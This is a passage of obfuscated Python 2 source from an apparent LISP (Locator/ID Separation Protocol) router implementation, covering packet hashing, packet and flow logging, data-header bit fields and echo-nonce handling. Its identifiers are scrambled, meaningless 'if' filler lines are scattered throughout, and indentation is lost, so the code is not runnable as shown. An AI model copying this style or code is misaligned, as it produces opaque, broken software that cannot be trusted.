lprint ( "Packet header: {}" . format ( IiiiIi1iiii11 ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
if 98 - 98: i1IIi - iII111i
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = IiIIi11i111
self . inner_dest . instance_id = IiIIi11i111
if 49 - 49: o0oOOo0O0Ooo . Ii1I . oO0o
if 9 - 9: IiII - II111iiii * OoO0O00
if 78 - 78: iIii1I11I1II1 / O0 * oO0o / iII111i / OoOoOO00
if 15 - 15: ooOoO0o / oO0o
if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii
if ( lisp_nonce_echoing and is_lisp_packet ) :
oooooO0oO0o = lisp_get_echo_nonce ( self . outer_source , None )
if ( oooooO0oO0o == None ) :
O0ooo0Ooo = self . outer_source . print_address_no_iid ( )
oooooO0oO0o = lisp_echo_nonce ( O0ooo0Ooo )
if 96 - 96: IiII
o0OOO = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
oooooO0oO0o . receive_request ( lisp_ipc_socket , o0OOO )
elif ( oooooO0oO0o . request_nonce_sent ) :
oooooO0oO0o . receive_echo ( lisp_ipc_socket , o0OOO )
if 40 - 40: i11iIiiIii * II111iiii
if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0
if 85 - 85: i1IIi . i1IIi
if 16 - 16: I1IiiI - OOooOOo % Ii1I . OOooOOo + I1ii11iIi11i % i11iIiiIii
if 59 - 59: i11iIiiIii - I11i
if ( i1I111II11 ) : self . packet += IiiiIi1iiii11 [ : ii11I ]
if 59 - 59: OoooooooOO * o0oOOo0O0Ooo / I1Ii111
if 75 - 75: o0oOOo0O0Ooo - OoooooooOO
if 21 - 21: I1IiiI + iIii1I11I1II1 / i11iIiiIii / oO0o
if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
if 26 - 26: i1IIi / I1IiiI / I11i + I11i
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 46 - 46: I1Ii111 % I1ii11iIi11i + Ii1I
if 67 - 67: iIii1I11I1II1 . i11iIiiIii . i11iIiiIii . i11iIiiIii / I11i + ooOoO0o
def strip_outer_headers ( self ) :
oO0ooOoO = 16
oO0ooOoO += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ oO0ooOoO : : ]
return ( self )
if 10 - 10: ooOoO0o - Oo0Ooo % II111iiii
if 66 - 66: iIii1I11I1II1 . iIii1I11I1II1
def hash_ports ( self ) :
IiiiIi1iiii11 = self . packet
Iii11111I1iii = self . inner_version
I1iI1111ii1I1 = 0
if ( Iii11111I1iii == 4 ) :
oO = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( oO )
if ( oO in [ 6 , 17 ] ) :
I1iI1111ii1I1 = oO
I1iI1111ii1I1 += struct . unpack ( "I" , IiiiIi1iiii11 [ 20 : 24 ] ) [ 0 ]
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 16 ) ^ ( I1iI1111ii1I1 & 0xffff )
if 7 - 7: Oo0Ooo / i11iIiiIii + OoOoOO00 + i11iIiiIii / IiII
if 66 - 66: I11i * i1IIi % OOooOOo / OoooooooOO * iII111i % ooOoO0o
if ( Iii11111I1iii == 6 ) :
oO = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 ] ) [ 0 ]
if ( oO in [ 6 , 17 ] ) :
I1iI1111ii1I1 = oO
I1iI1111ii1I1 += struct . unpack ( "I" , IiiiIi1iiii11 [ 40 : 44 ] ) [ 0 ]
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 16 ) ^ ( I1iI1111ii1I1 & 0xffff )
if 5 - 5: I1ii11iIi11i * Ii1I % I11i % II111iiii
if 9 - 9: o0oOOo0O0Ooo % I1Ii111 + I11i
return ( I1iI1111ii1I1 )
if 55 - 55: OoO0O00 - I1ii11iIi11i
if 38 - 38: iIii1I11I1II1 % IiII % OoO0O00 % O0 * iIii1I11I1II1 / I1Ii111
def hash_packet ( self ) :
I1iI1111ii1I1 = self . inner_source . address ^ self . inner_dest . address
I1iI1111ii1I1 += self . hash_ports ( )
if ( self . inner_version == 4 ) :
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 16 ) ^ ( I1iI1111ii1I1 & 0xffff )
elif ( self . inner_version == 6 ) :
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 64 ) ^ ( I1iI1111ii1I1 & 0xffffffffffffffff )
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 32 ) ^ ( I1iI1111ii1I1 & 0xffffffff )
I1iI1111ii1I1 = ( I1iI1111ii1I1 >> 16 ) ^ ( I1iI1111ii1I1 & 0xffff )
if 65 - 65: OOooOOo - I1IiiI * I1Ii111
self . udp_sport = 0xf000 | ( I1iI1111ii1I1 & 0xfff )
if 99 - 99: I1IiiI
if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
OoO0000O = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
# Oo0Ooo * I1Ii111
green ( OoO0000O , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if 53 - 53: Oo0Ooo / Ii1I + oO0o . iII111i + IiII
if 19 - 19: Ii1I
if ( s_or_r . find ( "Receive" ) != - 1 ) :
oo0 = "decap"
oo0 += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
oo0 = s_or_r
if ( oo0 in [ "Send" , "Replicate" ] or oo0 . find ( "Fragment" ) != - 1 ) :
oo0 = "encap"
if 25 - 25: o0oOOo0O0Ooo % iII111i . i11iIiiIii
if 4 - 4: OoooooooOO
o0OOOooOOOO = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if 5 - 5: I1IiiI . I11i . IiII
if 39 - 39: OOooOOo . Oo0Ooo - OoOoOO00 * i11iIiiIii
if 4 - 4: OoOoOO00 * O0 - I11i
if 72 - 72: I11i + ooOoO0o / I1IiiI . IiII % OoO0O00 / i11iIiiIii
if 13 - 13: I1Ii111 % o0oOOo0O0Ooo + OOooOOo + I1Ii111 + i11iIiiIii - I1ii11iIi11i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
if 70 - 70: II111iiii * II111iiii . I1IiiI
oOOo0ooO0 += bold ( "control-packet" , False ) + ": {} ..."
if 11 - 11: iII111i
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( o0OOOooOOOO , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if 5 - 5: OOooOOo + iII111i
if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i
if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
if ( self . lisp_header . k_bits ) :
if ( oo0 == "encap" ) : oo0 = "encrypt/encap"
if ( oo0 == "decap" ) : oo0 = "decap/decrypt"
if 11 - 11: I1ii11iIi11i / O0 + II111iiii
if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
OoO0000O = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
if 17 - 17: OoO0O00 - Oo0Ooo * O0 / Ii1I
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( o0OOOooOOOO , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( OoO0000O , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( oo0 ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 19 - 19: i1IIi - iIii1I11I1II1 . I11i
if 2 - 2: Ii1I
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
def get_raw_socket ( self ) :
IiIIi11i111 = str ( self . lisp_header . get_instance_id ( ) )
if ( IiIIi11i111 == "0" ) : return ( None )
if ( lisp_iid_to_interface . has_key ( IiIIi11i111 ) == False ) : return ( None )
if 81 - 81: iIii1I11I1II1
II1i = lisp_iid_to_interface [ IiIIi11i111 ]
OO0o0OO0 = II1i . get_socket ( )
if ( OO0o0OO0 == None ) :
O0ooo = bold ( "SO_BINDTODEVICE" , False )
OO = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( O0ooo , "drop" if OO else "forward" ) )
if 99 - 99: Ii1I / Oo0Ooo * II111iiii / O0
if ( OO ) : return ( None )
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
IiIIi11i111 = bold ( IiIIi11i111 , False )
o0 = bold ( II1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( IiIIi11i111 , o0 ) )
return ( OO0o0OO0 )
if 7 - 7: IiII
if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
def log_flow ( self , encap ) :
global lisp_flow_log
if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo
O0OOOOoOOO = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or O0OOOOoOOO ) :
oooOo = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = oooOo ) . start ( )
if ( O0OOOOoOOO ) : os . system ( "rm ./log-flows" )
return
if 91 - 91: I1IiiI - iII111i / OoO0O00 - OoO0O00 / Ii1I - IiII
if 14 - 14: OOooOOo / o0oOOo0O0Ooo + Ii1I / OoooooooOO - I11i
i1 = datetime . datetime . now ( )
lisp_flow_log . append ( [ i1 , encap , self . packet , self ] )
if 88 - 88: Ii1I / OoooooooOO % OoOoOO00 - i1IIi
if 49 - 49: o0oOOo0O0Ooo - iIii1I11I1II1
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
o00oo00O0OoOo = "{}: {}" . format ( ts , "encap" if encap else "decap" )
if 6 - 6: I1ii11iIi11i * Oo0Ooo + iIii1I11I1II1
ii1iIi111i1 = red ( self . outer_source . print_address_no_iid ( ) , False )
oOoOoO = red ( self . outer_dest . print_address_no_iid ( ) , False )
o0oOoo00 = green ( self . inner_source . print_address ( ) , False )
Ii11iIi1iIiii = green ( self . inner_dest . print_address ( ) , False )
if 11 - 11: I1ii11iIi11i / I1ii11iIi11i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
o00oo00O0OoOo += " {}:{} -> {}:{}, LISP control message type {}\n"
o00oo00O0OoOo = o00oo00O0OoOo . format ( ii1iIi111i1 , self . udp_sport , oOoOoO , self . udp_dport ,
self . inner_version )
return ( o00oo00O0OoOo )
if 39 - 39: O0 . I11i
if 45 - 45: oO0o + o0oOOo0O0Ooo + IiII / Ii1I + o0oOOo0O0Ooo
if ( self . outer_dest . is_null ( ) == False ) :
o00oo00O0OoOo += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
o00oo00O0OoOo = o00oo00O0OoOo . format ( ii1iIi111i1 , self . udp_sport , oOoOoO , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if 33 - 33: iII111i - Oo0Ooo - I11i
if 61 - 61: Ii1I + I1IiiI / i1IIi + i1IIi / oO0o
if 47 - 47: I1Ii111
if 25 - 25: iII111i + I1IiiI + OoOoOO00 + I1Ii111 % O0
if 26 - 26: ooOoO0o + OoOoOO00
if ( self . lisp_header . k_bits != 0 ) :
II111I1i1 = "\n"
if ( self . packet_error != "" ) :
II111I1i1 = " ({})" . format ( self . packet_error ) + II111I1i1
if 10 - 10: O0 . OoOoOO00 * IiII / I1Ii111 / i1IIi
o00oo00O0OoOo += ", encrypted" + II111I1i1
return ( o00oo00O0OoOo )
if 32 - 32: O0 / OOooOOo . ooOoO0o % I1Ii111
if 18 - 18: IiII * iII111i / I11i / O0
if 11 - 11: iIii1I11I1II1 / Ii1I + OoooooooOO % i1IIi * i11iIiiIii
if 86 - 86: i11iIiiIii - O0 - i11iIiiIii . iIii1I11I1II1 . IiII
if 84 - 84: i1IIi / iIii1I11I1II1 / oO0o / Ii1I
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
if 7 - 7: OoOoOO00 . OOooOOo % Oo0Ooo
if 55 - 55: ooOoO0o - Oo0Ooo * oO0o
oO = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
oO = struct . unpack ( "B" , oO ) [ 0 ]
if 72 - 72: o0oOOo0O0Ooo % o0oOOo0O0Ooo + iII111i + I1ii11iIi11i / Oo0Ooo
o00oo00O0OoOo += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
o00oo00O0OoOo = o00oo00O0OoOo . format ( o0oOoo00 , Ii11iIi1iIiii , len ( packet ) , self . inner_tos ,
self . inner_ttl , oO )
if 30 - 30: Oo0Ooo + I1IiiI + i11iIiiIii / OoO0O00
if 64 - 64: IiII
if 80 - 80: I1IiiI - i11iIiiIii / OoO0O00 / OoOoOO00 + OoOoOO00
if 89 - 89: O0 + IiII * I1Ii111
if ( oO in [ 6 , 17 ] ) :
iIIIIII = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( iIIIIII ) == 4 ) :
iIIIIII = socket . ntohl ( struct . unpack ( "I" , iIIIIII ) [ 0 ] )
o00oo00O0OoOo += ", ports {} -> {}" . format ( iIIIIII >> 16 , iIIIIII & 0xffff )
if 48 - 48: OoOoOO00 * OoooooooOO + OoooooooOO * iIii1I11I1II1 * II111iiii % i11iIiiIii
elif ( oO == 1 ) :
II = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( II ) == 2 ) :
II = socket . ntohs ( struct . unpack ( "H" , II ) [ 0 ] )
o00oo00O0OoOo += ", icmp-seq {}" . format ( II )
if 80 - 80: II111iiii - o0oOOo0O0Ooo . iIii1I11I1II1
if 44 - 44: i11iIiiIii % I11i % I1ii11iIi11i
if ( self . packet_error != "" ) :
o00oo00O0OoOo += " ({})" . format ( self . packet_error )
if 7 - 7: Oo0Ooo * OoO0O00 - II111iiii % I1Ii111 . Oo0Ooo . Oo0Ooo
o00oo00O0OoOo += "\n"
return ( o00oo00O0OoOo )
if 5 - 5: OoooooooOO * I1ii11iIi11i
if 42 - 42: o0oOOo0O0Ooo . I1Ii111 / O0 . II111iiii * OoOoOO00
def is_trace ( self ) :
iIIIIII = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in iIIIIII )
if 7 - 7: I1Ii111 * O0 + OoOoOO00
if 90 - 90: IiII * II111iiii * IiII - iII111i
if 34 - 34: OOooOOo - I1ii11iIi11i * iII111i % Ii1I
if 25 - 25: II111iiii + I1IiiI * ooOoO0o * I1ii11iIi11i . iII111i
if 26 - 26: iII111i - ooOoO0o / OoooooooOO + o0oOOo0O0Ooo . Oo0Ooo
if 75 - 75: O0 / OoOoOO00 . I1Ii111
if 7 - 7: OoO0O00 * iII111i
if 16 - 16: I1Ii111 . i1IIi . IiII
if 50 - 50: OoO0O00 - II111iiii * OoooooooOO - I1IiiI . O0 + O0
if 80 - 80: o0oOOo0O0Ooo
if 50 - 50: ooOoO0o
if 81 - 81: i11iIiiIii * iIii1I11I1II1 / Oo0Ooo * OOooOOo
if 83 - 83: i11iIiiIii - I1IiiI * i11iIiiIii
if 59 - 59: iII111i - OoooooooOO / ooOoO0o + I1ii11iIi11i . o0oOOo0O0Ooo - iII111i
if 29 - 29: oO0o
if 26 - 26: O0 % OOooOOo - IiII . OOooOOo
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 70 - 70: o0oOOo0O0Ooo + I11i / iII111i + ooOoO0o / I1IiiI
class lisp_data_header ( ) :
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
if 33 - 33: OoooooooOO . O0
if 59 - 59: iIii1I11I1II1
def print_header ( self , e_or_d ) :
i1OOoO0OO0oO = lisp_hex_string ( self . first_long & 0xffffff )
iii1 = lisp_hex_string ( self . second_long ) . zfill ( 8 )
if 26 - 26: OOooOOo + Oo0Ooo
oOOo0ooO0 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
if 71 - 71: I1IiiI . ooOoO0o
return ( oOOo0ooO0 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
i1OOoO0OO0oO , iii1 ) )
if 43 - 43: I1ii11iIi11i * OOooOOo
if 1 - 1: OoO0O00 * ooOoO0o + IiII . oO0o / ooOoO0o
def encode ( self ) :
O0O00Oo = "II"
i1OOoO0OO0oO = socket . htonl ( self . first_long )
iii1 = socket . htonl ( self . second_long )
if 49 - 49: i1IIi - OOooOOo / o0oOOo0O0Ooo % IiII - ooOoO0o
O00O0OO = struct . pack ( O0O00Oo , i1OOoO0OO0oO , iii1 )
return ( O00O0OO )
if 76 - 76: I1IiiI
if 41 - 41: OoOoOO00 % I1Ii111 * oO0o * i1IIi
def decode ( self , packet ) :
O0O00Oo = "II"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( False )
if 27 - 27: ooOoO0o . Oo0Ooo + ooOoO0o + iII111i
i1OOoO0OO0oO , iii1 = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 28 - 28: OoO0O00 - ooOoO0o - oO0o % oO0o / O0
if 99 - 99: II111iiii - iIii1I11I1II1
self . first_long = socket . ntohl ( i1OOoO0OO0oO )
self . second_long = socket . ntohl ( iii1 )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
if 24 - 24: I1IiiI - i1IIi - O0 % I1Ii111 - iIii1I11I1II1 . I11i
if 26 - 26: OoO0O00 % i1IIi * O0 . I1Ii111
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
if 31 - 31: O0 - IiII * i11iIiiIii * i1IIi
if 78 - 78: ooOoO0o * OoOoOO00 . Ii1I . OoOoOO00 % iIii1I11I1II1
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
if 67 - 67: Ii1I . Oo0Ooo
if 39 - 39: I11i * I1Ii111
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
if 63 - 63: ooOoO0o % I1IiiI . OOooOOo - ooOoO0o / Oo0Ooo % I1IiiI
if 39 - 39: o0oOOo0O0Ooo . i1IIi % oO0o / I11i % O0
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
if 100 - 100: I1Ii111 - OoOoOO00
if 78 - 78: OoooooooOO - OoOoOO00 . i11iIiiIii
def get_instance_id ( self ) :
return ( ( self . second_long >> 8 ) & 0xffffff )
if 36 - 36: oO0o * iII111i + IiII * iII111i . I1ii11iIi11i - iIii1I11I1II1
if 14 - 14: I11i * oO0o + i11iIiiIii
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
if 84 - 84: iII111i / II111iiii
if 86 - 86: I1IiiI
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
if 97 - 97: II111iiii
if 38 - 38: I1IiiI
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
if 42 - 42: o0oOOo0O0Ooo
if 8 - 8: i11iIiiIii / ooOoO0o
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
if 33 - 33: I1Ii111 * IiII - O0 + I1IiiI / IiII
if 19 - 19: i1IIi % II111iiii
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
if 85 - 85: IiII - o0oOOo0O0Ooo % OOooOOo - II111iiii
if 56 - 56: Ii1I * i11iIiiIii
if 92 - 92: II111iiii - O0 . I1Ii111
class lisp_echo_nonce ( ) :
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
if 59 - 59: OoOoOO00
if 47 - 47: II111iiii - I1ii11iIi11i - Ii1I
def send_ipc ( self , ipc_socket , ipc ) :
iI1Iii1i1 = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
Ii1II1I11i1I = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , iI1Iii1i1 )
lisp_ipc ( ipc , ipc_socket , Ii1II1I11i1I )
if 87 - 87: i11iIiiIii * II111iiii - Ii1I % OoooooooOO
if 55 - 55: i1IIi
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
oOOO0oo0 = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , oOOO0oo0 )
if 13 - 13: OoOoOO00 - OoO0O00 * OoooooooOO
if 26 - 26: OoooooooOO
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
oOOO0oo0 = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , oOOO0oo0 )
if 65 - 65: OOooOOo
if 14 - 14: ooOoO0o
def receive_request ( self , ipc_socket , nonce ) :
Ooo0OO00oo = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( Ooo0OO00oo != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
if 21 - 21: I11i
if 79 - 79: OoO0O00 / OOooOOo - i1IIi + i1IIi - IiII + IiII
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
if 67 - 67: OoO0O00 * OoO0O00 / OoooooooOO
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
if 79 - 79: o0oOOo0O0Ooo % iIii1I11I1II1 / II111iiii / Ii1I / Ii1I + O0
if 46 - 46: i1IIi / IiII
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
if 84 - 84: OoOoOO00 / iIii1I11I1II1 + oO0o % ooOoO0o + oO0o - iIii1I11I1II1
if 27 - 27: O0 / o0oOOo0O0Ooo * I1IiiI
if 41 - 41: ooOoO0o
if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
if 96 - 96: I1ii11iIi11i % I1ii11iIi11i
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
ii1 = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if 26 - 26: oO0o - ooOoO0o % Oo0Ooo - oO0o + IiII
if 33 - 33: Ii1I + OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 % i1IIi * IiII
if ( remote_rloc . address > ii1 . address ) :
oO0OO = "exit"
self . request_nonce_sent = None
else :
oO0OO = "stay in"
self . echo_nonce_sent = None
if 21 - 21: O0 * ooOoO0o % OoO0O00
if 14 - 14: O0 / I1Ii111 / ooOoO0o + IiII - IiII
IiiI11iIi = bold ( "collision" , False )
IIi1I1 = red ( ii1 . print_address_no_iid ( ) , False )
I1I111iIiI = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( IiiI11iIi ,
IIi1I1 , I1I111iIiI , oO0OO ) )
if 1 - 1: Ii1I * OoooooooOO - ooOoO0o % OOooOOo - OoooooooOO
if 83 - 83: OoooooooOO . iII111i
if 20 - 20: OoO0O00 . oO0o
if 4 - 4: Oo0Ooo % Ii1I % OoO0O00 * iII111i % OoooooooOO
if 38 - 38: OoooooooOO . iII111i
if ( self . echo_nonce_sent != None ) :
o0OOO = self . echo_nonce_sent
iIIi1iI1I1IIi = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( iIIi1iI1I1IIi ,
lisp_hex_string ( o0OOO ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( o0OOO )
if 43 - 43: OoooooooOO
if 8 - 8: OOooOOo + I11i . I11i
if 89 - 89: I1ii11iIi11i * I1ii11iIi11i * OoOoOO00 / iII111i
if 60 - 60: OoO0O00 / iII111i / I1IiiI + oO0o
if 93 - 93: OoooooooOO * Ii1I / O0 + Ii1I - iIii1I11I1II1
if 6 - 6: IiII - Oo0Ooo - I11i - O0 % OoooooooOO
if 88 - 88: O0 / o0oOOo0O0Ooo * o0oOOo0O0Ooo . o0oOOo0O0Ooo . O0
o0OOO = self . request_nonce_sent
IiI1i11iiII = self . last_request_nonce_sent
if ( o0OOO and IiI1i11iiII != None ) :
if ( time . time ( ) - IiI1i11iiII >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( o0OOO ) ) )
if 64 - 64: Ii1I
return ( None )
if 47 - 47: I1IiiI * i11iIiiIii . OOooOOo . iII111i . i11iIiiIii
if 33 - 33: I1ii11iIi11i % OoooooooOO . O0 * o0oOOo0O0Ooo % Oo0Ooo
if 79 - 79: I11i - I1IiiI * Ii1I % II111iiii - II111iiii
if 16 - 16: OOooOOo . II111iiii - Ii1I - OoooooooOO
if 83 - 83: i11iIiiIii - Oo0Ooo
if 5 - 5: I1ii11iIi11i . II111iiii . i1IIi
if 35 - 35: o0oOOo0O0Ooo + OoO0O00 - I1ii11iIi11i
if 24 - 24: II111iiii
if 23 - 23: Oo0Ooo - iII111i
if ( o0OOO == None ) :
o0OOO = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( o0OOO )
if 79 - 79: I11i . O0 - i1IIi
self . request_nonce_sent = o0OOO
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( o0OOO ) ) )
if 42 - 42: oO0o - i11iIiiIii % oO0o - I1Ii111 * O0 / II111iiii
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if 5 - 5: Oo0Ooo
if 84 - 84: I1ii11iIi11i
if 53 - 53: oO0o
if 26 - 26: I1Ii111 / I1Ii111 + Oo0Ooo - o0oOOo0O0Ooo % II111iiii . OoooooooOO
if 7 - 7: II111iiii - I1ii11iIi11i / I11i % OoooooooOO + i1IIi
if ( lisp_i_am_itr == False ) : return ( o0OOO | 0x80000000 )
self . send_request_ipc ( ipc_socket , o0OOO )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( o0OOO ) ) )
if 42 - 42: I11i + i1IIi - Ii1I / IiII . iII111i
